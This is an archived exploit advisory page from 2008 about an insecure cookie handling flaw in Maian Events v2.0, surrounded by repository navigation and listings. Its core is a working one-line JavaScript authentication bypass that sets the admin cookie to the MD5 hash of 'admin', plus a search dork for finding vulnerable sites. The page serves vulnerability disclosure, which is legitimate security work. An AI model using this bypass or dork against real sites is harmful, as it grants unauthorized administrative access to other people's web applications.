maianevents-cookie.txt

maianevents-cookie.txt: Posted Jul 15, 2008; Authored by Saime; Maian Events version 2.0 suffers from a poorly designed cookie vulnerability.; tags | exploit; SHA-256 | 109aad15912a224b4490ae868c58a9e1e09d31bae4851c465710810906825354; Download | Favorite | View

maianevents-cookie.txt

Author: Saime
Date: July 12, 2008
Script: Maian Events v2.0 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Maian Events v2.0 Copyright © 2005-2008 Maian Script World. All Rights Reserved

Description:
Maian Events v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mevents_admin_cookie,
equals admin username(md5)

Exploit:
javascript:document.cookie = "mevents_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/"
Note:
The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 61 files
LiquidWorm 24 files
Debian 18 files
indoushka 15 files
Apple 9 files
Google Security Research 6 files
Gentoo 5 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,156)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,827)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,244)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

maianevents-cookie.txt

maianevents-cookie.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

maianevents-cookie.txt

Share This

maianevents-cookie.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems